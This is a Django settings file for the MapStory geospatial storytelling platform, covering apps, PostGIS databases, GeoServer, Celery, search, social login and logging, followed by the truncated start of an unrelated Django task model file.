'..'))\n\nWSGI_APPLICATION = \"mapstory.wsgi.application\"\n\nSTATICFILES_DIRS = [\n os.path.join(LOCAL_ROOT, \"static\"),\n ] + STATICFILES_DIRS\n\nMEDIA_ROOT = os.environ['MEDIA_ROOT']\nSTATIC_ROOT = os.environ['STATIC_ROOT']\n\n\n# Location of url mappings\nROOT_URLCONF = 'mapstory.urls'\n\n# Location of locale files\nLOCALE_PATHS = (\n os.path.join(LOCAL_ROOT, 'locale'),\n ) + LOCALE_PATHS\n\n#\n# Application Settings\n#\n# This removes actstream in order to add it at the end of installed apps.\n# This is recommended by the actstream docs:\n# http://django-activity-stream.readthedocs.io/en/latest/installation.html#basic-app-configuration\ninstalled_apps_list = list(INSTALLED_APPS)\ninstalled_apps_list.remove('actstream')\nINSTALLED_APPS = tuple(installed_apps_list)\nINSTALLED_APPS += (\n 'django_nose',\n 'mapstory',\n 'django.contrib.webdesign',\n 'geonode',\n 'geonode.contrib.geogig',\n 'icon_commons',\n 'maploom',\n 'haystack',\n 'mailer',\n 'django_slack',\n 'fluent_comments',\n 'crispy_forms',\n 'threadedcomments',\n 'django_comments',\n 'osgeo_importer',\n 'solo',\n 'coverage',\n 'notification',\n 'mapstory.apps.health_check_geoserver',\n 'mapstory.apps.thumbnails',\n 'mapstory.storypins',\n 'mapstory.apps.journal',\n 'mapstory.apps.favorite',\n 'mapstory.apps.teams',\n 'mapstory.apps.organizations',\n 'mapstory.apps.initiatives',\n 'mapstory.mapstory_profile',\n
'mapstory.mapstories',\n 'health_check',\n 'health_check.db',\n 'health_check.cache',\n 'health_check.storage',\n 'health_check.contrib.celery',\n 'health_check.contrib.s3boto_storage',\n)\n# DO NOT REMOVE (read comment above)\nINSTALLED_APPS += (\n 'mapstory.apps.activities',\n 'actstream',\n)\n# Thanks!\n\nMAPSTORY_APPS = (\n\n 'mapstory.apps.storyframes',\n 'mapstory.apps.flag', # - temporarily using this instead of the flag app for django because it needs to use AUTH_USER_MODEL\n\n)\n\nINSTALLED_APPS += MAPSTORY_APPS\n\n#\n# Template Settings\n#\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(LOCAL_ROOT, 'templates'),\n os.path.join(os.path.dirname(geonode.__file__), 'templates'),\n os.path.join('deps/story-tools-composer', 'partials'),\n os.path.join(LOCAL_ROOT, 'apps/initiatives'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.tz',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'account.context_processors.account',\n 'geonode.context_processors.resource_urls',\n 'geonode.geoserver.context_processors.geoserver_urls',\n 'mapstory.context_processors.context',\n 'user_messages.context_processors.user_messages'\n ],\n },\n },\n]\n\n#\n# Database Settings\n#\nDATABASE_HOST = os.environ['DATABASE_HOST']\nDATABASE_PASSWORD = os.environ['DATABASE_PASSWORD']\nDATABASE_PORT = '5432'\n\nif DATABASE_PASSWORD:\n DATABASES = {\n 'default': {\n # we use transaction_hooks so we can attach on_commit actions\n 'ENGINE': 'transaction_hooks.backends.postgresql_psycopg2',\n 'NAME': 'mapstory',\n 'USER': 'mapstory',\n 'PASSWORD': DATABASE_PASSWORD,\n 'HOST': DATABASE_HOST,\n 'PORT': '5432',\n },\n 'datastore': {\n 'ENGINE': 'django.contrib.gis.db.backends.postgis',\n 'NAME': 'mapstory_data',\n 'USER': 'mapstory',\n 'PASSWORD': DATABASE_PASSWORD,\n 'HOST': DATABASE_HOST,\n 'PORT': '5432',\n },\n 'geogig': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'mapstory_geogig',\n 'USER': 'mapstory',\n 'PASSWORD': DATABASE_PASSWORD,\n 'HOST': DATABASE_HOST,\n 'PORT': '5432',\n }\n }\n\n UPLOADER = {\n 'BACKEND': 'geonode.importer',\n 'OPTIONS': {\n 'TIME_ENABLED': True,\n 'GEOGIG_ENABLED': True,\n }\n }\n\n USE_BIG_DATE = True\n\n GEOGIG_DATASTORE_NAME = 'geogig'\n\n#\n# Geoserver Settings\n#\nGEOSERVER_LOCATION = \"%s://%s:%d/geoserver/\" % (os.environ['PRIVATE_PROTOCOL'], os.environ['GEOSERVER_HOST_INTERNAL'], int(os.environ['GEOSERVER_PORT_INTERNAL']))\nGEOSERVER_PUBLIC_LOCATION = \"%s://%s/geoserver/\" % (os.environ['PUBLIC_PROTOCOL'], os.environ['PUBLIC_HOST'])\n\nOGC_SERVER = {\n 'default': {\n 'BACKEND': 'geonode.geoserver',\n 'LOCATION': GEOSERVER_LOCATION,\n 'LOGIN_ENDPOINT': 'j_spring_oauth2_geonode_login',\n 'LOGOUT_ENDPOINT': 'j_spring_oauth2_geonode_logout',\n # PUBLIC_LOCATION needs to be kept like this because in dev mode\n # the proxy won't work and the integration tests will fail\n # the entire block has to be overridden in the local_settings\n 'PUBLIC_LOCATION': GEOSERVER_PUBLIC_LOCATION,\n 'USER': 'admin',\n 'PASSWORD': os.environ['GEOSERVER_PASSWORD'],\n 'MAPFISH_PRINT_ENABLED': True,\n 'PRINT_NG_ENABLED': True,\n 'GEONODE_SECURITY_ENABLED': True,\n 'GEOGIG_ENABLED': True,\n 'WMST_ENABLED':
False,\n 'BACKEND_WRITE_ENABLED': True,\n 'WPS_ENABLED': True,\n 'LOG_FILE': '%s/geoserver/data/logs/geoserver.log'\n % os.path.abspath(os.path.join(PROJECT_ROOT, os.pardir)),\n # Set to name of database in DATABASES dictionary to enable\n 'DATASTORE': 'geogig',\n 'TIMEOUT': 10, # number of seconds to allow for HTTP requests,\n 'GEOGIG_DATASTORE_DIR': '/var/lib/geoserver/data/geogig',\n 'PG_GEOGIG': True\n }\n}\n\n\ndef str_to_bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n\n#\n# Email Settings\n#\nACCOUNT_ACTIVATION_DAYS = int(os.environ.get('ACCOUNT_ACTIVATION_DAYS', '0'))\nACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = '/'\nACCOUNT_EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL = '/'\nACCOUNT_EMAIL_CONFIRMATION_EMAIL = True\nACCOUNT_EMAIL_CONFIRMATION_REQUIRED = str_to_bool(os.environ['ACCOUNT_EMAIL_CONFIRMATION_REQUIRED'])\nACCOUNT_LOGIN_REDIRECT_URL = '/'\nACCOUNT_OPEN_SIGNUP = True\nDEFAULT_FROM_EMAIL = os.environ.get('DEFAULT_FROM_EMAIL', '')\nEMAIL_BACKEND = os.environ.get('EMAIL_BACKEND', 'django.core.mail.backends.console.EmailBackend')\nEMAIL_HOST = os.environ.get('EMAIL_HOST', '')\nEMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD', '')\nEMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER', '')\nEMAIL_PORT = int(os.environ.get('EMAIL_PORT', '25'))\nEMAIL_USE_TLS = str_to_bool(os.environ.get('EMAIL_USE_TLS', 'false'))\nTHEME_ACCOUNT_CONTACT_EMAIL = os.environ.get('EMAIL_HOST_USER', '')\n\n#\n# AWS S3 Settings\n#\nAWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID','')\nAWS_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME' ,'')\nAWS_STORAGE_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME','')\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY','')\nAWS_S3_BUCKET_DOMAIN = '%s.s3.amazonaws.com' % (AWS_STORAGE_BUCKET_NAME,)\nUSE_AWS_S3_STATIC = False\nUSE_AWS_S3_MEDIA = False\n\nif USE_AWS_S3_STATIC:\n STATICFILES_LOCATION = 'static'\n STATICFILES_STORAGE = 'mapstory.s3_storages.StaticStorage'\n STATIC_URL = \"https://%s/%s/\" % (AWS_S3_BUCKET_DOMAIN, STATICFILES_LOCATION)\n REMOTE_CONTENT_URL = STATIC_URL + 'assets'\n\nif USE_AWS_S3_MEDIA:\n MEDIAFILES_LOCATION = 'media'\n MEDIA_URL = \"https://%s/%s/\" % (AWS_S3_BUCKET_DOMAIN, MEDIAFILES_LOCATION)\n DEFAULT_FILE_STORAGE = 'mapstory.s3_storages.MediaStorage'\n\n#\n# Django OSGEO Importer Settings\n#\nIMPORT_HANDLERS = (\n 'mapstory.import_handlers.TruncatedNameHandler',\n 'osgeo_importer.handlers.BigDateFieldConverterHandler',\n 'osgeo_importer.handlers.geoserver.GeoserverPublishHandler',\n 'osgeo_importer.handlers.geoserver.GeoServerBoundsHandler',\n 'osgeo_importer.handlers.geoserver.GeoServerTimeHandler',\n 'osgeo_importer.handlers.geoserver.GeoWebCacheHandler',\n 'osgeo_importer.handlers.geonode.GeoNodePublishHandler',\n 'mapstory.import_handlers.LayerAppendHandler'\n)\n\nOSGEO_IMPORTER_GEONODE_ENABLED = True\nOSGEO_DATASTORE = 'datastore'\n# Soft time limit for the import_object celery task of django_osgeo_importer, should be changed later after testing.\nIMPORT_TASK_SOFT_TIME_LIMIT = 1800\nPROJECTION_DIRECTORY = os.path.join(os.path.dirname(pyproj.__file__), 'data/')\n\nDEFAULT_IMPORTER_CONFIG = {\n 'configureTime': True,\n 'editable': True,\n 'convert_to_date': [],\n 'always_geogig': True,\n 'index': 0,\n 'permissions': {'users':{'AnonymousUser':['change_layer_data', 'download_resourcebase', 'view_resourcebase']}, 'groups':{'registered':['change_layer_style']}}\n}\n\n# Append only needs to import to temporarily store changes, so we turn off editable and the geogig 
history.\nDEFAULT_APPEND_CONFIG = {\n 'configureTime': True,\n 'editable': False,\n 'convert_to_date': [],\n 'always_geogig': False,\n 'index': 0\n}\n\n# the layer_create view allows users to create layer by providing a workspace and a featureType\n# this settings whitelists the datastores in which layers creation are allowed\nALLOWED_DATASTORE_LAYER_CREATE = ('*',)\n\n# @todo remove this hack once maploom can deal with other config\n# have to put this after local_settings or any adjustments to OGC_SERVER will\n# not get picked up\nMAP_BASELAYERS = [\n {\n \"source\": {\n \"ptype\": \"gxp_wmscsource\",\n # Setting lazy=True will prevent MapLoom from making a getCapabilities request until\n # the user tries to add a layer.\n # See https://github.com/ROGUE-JCTD/MapLoom/commit/d7ea83d17b4e17150f02a0c9e94a79c3592297c2.\n \"lazy\": True,\n \"url\": OGC_SERVER['default']['PUBLIC_LOCATION'] + \"wms\",\n \"restUrl\": \"/gs/rest\",\n \"name\": \"local geoserver\"\n }\n },\n {\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer\",\n \"args\": [\"No background\"],\n \"visibility\": False,\n \"fixed\": True,\n \"group\": \"background\"\n },\n {\n \"source\": {\"ptype\": \"gxp_osmsource\"},\n \"type\": \"OpenLayers.Layer.OSM\",\n \"args\": [\"OpenStreetMap\"],\n \"name\": 'mapnik',\n 'title': 'OpenStreetMap',\n \"visibility\": False,\n \"fixed\": True,\n \"group\": \"background\"\n },\n {\n \"source\": {\"ptype\": \"gxp_osmsource\"},\n \"type\": \"OpenLayers.Layer.OSM\",\n \"args\": [\"Humanitarian OpenStreetMap\", [\n \"//a.tile.openstreetmap.fr/hot/${z}/${x}/${y}.png\",\n \"//b.tile.openstreetmap.fr/hot/${z}/${x}/${y}.png\",\n \"//c.tile.openstreetmap.fr/hot/${z}/${x}/${y}.png\"\n ], {\"tileOptions\": {\"crossOriginKeyword\": None}}\n ],\n 'title': 'Humanitarian OpenStreetMap',\n 'name': \"hot\",\n \"visibility\": False,\n \"fixed\": True,\n \"group\": \"background\"\n },\n {\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer.WMS\",\n \"group\": \"background\",\n \"visibility\": False,\n \"fixed\": True,\n \"args\": [\n \"Naked Earth\",\n \"//maps.opengeo.org/geowebcache/service/wms\",\n {\n \"layers\": [\"Wayne\"],\n \"format\": \"image/png\",\n \"tiled\": True,\n \"tilesOrigin\": [-20037508.34, -20037508.34]\n },\n {\"buffer\": 0}\n ]\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'visibility': False,\n 'name': 'natural-earth-1',\n 'title': 'Natural Earth',\n 'group': 'background'\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'visibility': False,\n 'name': 'natural-earth-2',\n 'title': 'Natural Earth 2',\n 'group': 'background'\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'visibility': False,\n 'name': 'geography-class',\n 'title': 'Geography Class',\n 'group': 'background'\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'visibility': False,\n 'name': 'control-room',\n 'title': 'MapBoxControlRoom',\n 'group': 'background'\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'visibility': False,\n 'name': 'world-dark',\n 'title': 'World Dark',\n 'group': 'background'\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'name': 'world-light',\n 'title': 'World Light',\n 'group': 'background'\n }\n]\n\n#\n# Avatar Settings\n#\nAVATAR_DEFAULT_URL = \"%s/static/mapstory/img/default_avatar_lg.png\" % SITEURL\nAVATAR_GRAVATAR_BACKUP = False\nAVATAR_GRAVATAR_SSL = 
True\nAUTO_GENERATE_AVATAR_SIZES = (35, 45, 75, 100)\n\n#\n# Celery Settings\n#\nBROKER_URL = \"amqp://mapstory:%s@%s/%s\" % (os.environ['RABBITMQ_APPLICATION_PASSWORD'], os.environ['RABBITMQ_HOST'], os.environ['RABBITMQ_APPLICATION_VHOST'])\nCELERY_ALWAYS_EAGER = str_to_bool(os.environ.get('CELERY_ALWAYS_EAGER', 'False')) # False makes tasks run asynchronously\nCELERY_DEFAULT_QUEUE = \"default\"\nCELERY_DEFAULT_EXCHANGE = \"default\"\nCELERY_DEFAULT_EXCHANGE_TYPE = \"direct\"\nCELERY_DEFAULT_ROUTING_KEY = \"default\"\nCELERY_CREATE_MISSING_QUEUES = True\nCELERY_EAGER_PROPAGATES_EXCEPTIONS = str_to_bool(os.environ.get('CELERY_EAGER_PROPAGATES_EXCEPTIONS', 'False'))\nCELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'\nCELERY_IGNORE_RESULT = False\n\n#\n# Haystack Settings\n#\nHAYSTACK_SEARCH = True\n# Update facet counts from Haystack\nHAYSTACK_FACET_COUNTS = False\nHAYSTACK_URL = \"%s://%s:%d\" % (os.environ['PRIVATE_PROTOCOL'], os.environ['ELASTIC_HOST'], int(os.environ['ELASTIC_PORT']))\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'mapstory.search.elasticsearch_backend.MapStoryElasticsearchSearchEngine',\n 'URL': HAYSTACK_URL,\n 'INDEX_NAME': 'geonode',\n 'EXCLUDED_INDEXES': ['geonode.layers.search_indexes.LayerIndex'],\n },\n}\nSKIP_PERMS_FILTER = True\nHAYSTACK_SIGNAL_PROCESSOR = 'mapstory.search.signals.RealtimeSignalProcessor'\n\n#\n# Social Authentication Settings\n#\nENABLE_SOCIAL_LOGIN = str_to_bool(os.environ['ENABLE_SOCIAL_LOGIN'])\nif ENABLE_SOCIAL_LOGIN:\n SOCIAL_AUTH_NEW_USER_REDIRECT_URL = '/'\n\n INSTALLED_APPS += (\n 'social.apps.django_app.default',\n 'provider',\n 'provider.oauth2',\n )\n\n AUTHENTICATION_BACKENDS = (\n 'social.backends.google.GoogleOAuth2',\n 'social.backends.facebook.FacebookOAuth2',\n )\n\nDEFAULT_AUTH_PIPELINE = (\n 'social.pipeline.social_auth.social_details',\n 'social.pipeline.social_auth.social_uid',\n 'social.pipeline.social_auth.auth_allowed',\n 'social.pipeline.social_auth.social_user',\n 'social.pipeline.user.get_username',\n 'social.pipeline.mail.mail_validation',\n 'social.pipeline.social_auth.associate_by_email',\n 'social.pipeline.user.create_user',\n 'social.pipeline.social_auth.associate_user',\n 'social.pipeline.social_auth.load_extra_data',\n 'social.pipeline.user.user_details'\n)\n\nSOCIAL_AUTH_FACEBOOK_KEY = os.environ.get('FACEBOOK_APP_ID','')\nSOCIAL_AUTH_FACEBOOK_SECRET = os.environ.get('FACEBOOK_APP_SECRET','')\nSOCIAL_AUTH_FACEBOOK_SCOPE = ['email']\nSOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {\n 'fields': 'id,name,email',\n}\n\nSOCIAL_AUTH_GOOGLE_OAUTH2_KEY = os.environ.get('GOOGLE_OATH2_CLIENT_ID','')\nSOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = os.environ.get('GOOGLE_OATH2_CLIENT_SECRET','')\n\nGEOFENCE_SECURITY_ENABLED = False\n\n#\n# Activity Stream Settings\n#\nSITE_ID = 1\nACTSTREAM_SETTINGS = {\n 'FETCH_RELATIONS': True,\n 'USE_PREFETCH': False,\n 'USE_JSONFIELD': True,\n 'GFK_FETCH_DEPTH': 1,\n}\n#\n# Threaded Comment Settings\n#\nFLUENT_COMMENTS_EXCLUDE_FIELDS = ('name', 'email', 'url', 'title')\nCOMMENTS_APP = 'fluent_comments'\n\n#\n# Automated Testing Settings\n#\nclass DisableMigrations(object):\n def __contains__(self, item):\n return True\n\n def __getitem__(self, item):\n return \"notmigrations\"\n\n\n# Disable migrations only on tests\nTESTS_IN_PROGRESS = False\nif 'test' in sys.argv[1:] or 'jenkins' in sys.argv[1:]:\n logging.disable(logging.CRITICAL)\n PASSWORD_HASHERS = (\n 'django.contrib.auth.hashers.MD5PasswordHasher',\n )\n DEBUG = False\n TEMPLATE_DEBUG = False\n TESTS_IN_PROGRESS = 
True\n MIGRATION_MODULES = DisableMigrations()\n\n# Setup django-nose as our test runner and have it provide us with HTML coverage reports generated in the cover folder.\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n# TESTS NEED TO BE RUN WITH ./test.sh for coverage to work!!!\n# https://stackoverflow.com/questions/24668174/how-to-test-coverage-properly-with-django-nose\n# Nose Test arguments. Will not find and run tests unless --exe is specified.\n# Nose-runner has issues with coverage reporting and model loading.\n# https://github.com/django-nose/django-nose/issues/180\n# Coverage options are now specified in `.coveragerc`\nNOSE_ARGS = [\n '--exe',\n # This:\n '--ignore-files=(^\\.|^_|pavement\\.py$|fabfile\\.py$|local_settings\\.py$|cf\\.py$|search_indexes\\.py$)',\n # Is not the same as this:\n # '--exclude=(^\\.|^_|pavement\\.py$|fabfile\\.py$|_settings\\.py$|cf\\.py$|search_indexes\\.py$)',\n '--all-modules',\n '--traverse-namespace',\n # FOR DEBUGGING:\n # '--detailed-errors',\n # '--with-id',\n # '--pdb',\n # '--verbosity=3',\n # '--stop',\n]\n\n#\n# Debug Settings\n#\nDEBUG_STATIC = True\nDEBUG = str_to_bool(os.environ.get('DEBUG', 'False'))\nif not DEBUG:\n ALLOWED_HOSTS = os.environ.get('ALLOWED_HOSTS', '').split('|')\nSESSION_COOKIE_DOMAIN = None\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(message)s',\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'null': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.NullHandler',\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n 'mail_admins': {\n 'level': 'ERROR', 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler',\n },\n 'slack_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django_slack.log.SlackExceptionHandler'\n }\n },\n \"loggers\": {\n \"django\": {\n \"handlers\": [\"console\", \"slack_admins\"], \"level\": \"ERROR\", },\n \"mapstory\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"gsconfig.catalog\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"owslib\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"pycsw\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"elasticsearch\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"osgeo_importer\": {\n \"handlers\": [\"console\"], \"level\": \"DEBUG\", },\n },\n}\n\n#\n# Slack Settings\n#\nSLACK_BACKEND = os.environ.get('SLACK_BACKEND', 'django_slack.backends.RequestsBackend')\nSLACK_TOKEN = os.environ.get('SLACK_TOKEN', '')\nSLACK_CHANNEL = os.environ.get('SLACK_CHANNEL', '')\nSLACK_ICON_EMOJI = os.environ.get('SLACK_ICON_EMOJI', '')\nSLACK_USERNAME = os.environ.get('SLACK_USERNAME', '')\n\n#\n# Misc Settings\n#\nREGISTRATION_OPEN = True\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nAUTOCOMPLETE_QUICK_SEARCH = False\nTHEME = os.environ.get('THEME', 'default')\nUSER_SNAP = True\nGOOGLE_ANALYTICS = os.environ.get('GOOGLE_ANALYTICS', '')\nLOCAL_CONTENT = False\n\n# Override number of results per page listed in the GeoNode search pages\nCLIENT_RESULTS_LIMIT = 30\n\n# Download formats available in layer detail download modal\nDOWNLOAD_FORMATS_VECTOR = [\n 'Zipped Shapefile', 'GML 2.0', 'GML 3.1.1', 'CSV', 'GeoJSON', 
'KML',\n]\n\nMESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'\n\nSCHEMA_DOWNLOAD_EXCLUDE = [\n 'FID',\n 'ogc_fid',\n 'date_xd',\n 'date_parsed',\n]\n\n#\n# Feature toggles\n#\nFEATURE_MULTIPLE_STORY_CHAPTERS = str_to_bool(os.environ.get('FEATURE_MULTIPLE_STORY_CHAPTERS', 'False'))\n\n# Choose thumbnail generator -- this is the delayed phantomjs generator\nTHUMBNAIL_GENERATOR = \"mapstory.apps.thumbnails.tasks.create_gs_thumbnail_mapstory_tx_aware\"\n", "repo_name": "ngageoint/storyscapes", "sub_path": "mapstory/settings/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 21735, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 107, "usage_type": "call"}, {"api_name": "geonode.__file__", "line_number": 107, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 183, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 184, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 206, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 223, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 223, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 227, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 230, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 230, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 231, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 231, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 232, "usage_type": "call"}, {"api_name": 
"os.environ", "line_number": 232, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 233, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 233, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 234, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 234, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 235, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 235, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 236, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 236, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 237, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 237, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 242, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 243, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 243, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 244, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 244, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 245, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 245, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 279, "usage_type": "call"}, {"api_name": "pyproj.__file__", "line_number": 279, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 442, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 443, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 443, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 449, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 449, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 459, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 474, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 503, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 503, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 504, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 504, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 510, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 510, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 511, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 511, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 544, "usage_type": "attribute"}, {"api_name": "logging.disable", "line_number": 545, "usage_type": "call"}, {"api_name": "logging.CRITICAL", "line_number": 545, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 582, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 582, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 584, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 584, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 644, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 644, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 645, 
"usage_type": "call"}, {"api_name": "os.environ", "line_number": 645, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 646, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 646, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 647, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 647, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 648, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 648, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 656, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 656, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 658, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 658, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 681, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 681, "usage_type": "attribute"}]} +{"seq_id": "73453534564", "text": "from django.db import models\nfrom django_mysql.models import JSONField\nfrom kratos.apps.pipeline.models import Pipeline\nfrom kratos.apps.tasktpl.models import Tasktpl\n\n\nclass Task(models.Model):\n pipeline = models.ForeignKey(Pipeline, on_delete=models.CASCADE, related_name='task')\n tasktpl = models.ForeignKey(Tasktpl, on_delete=models.CASCADE, related_name='task')\n params = JSONField()\n stage = models.IntegerField(default=1)\n seq = models.IntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class 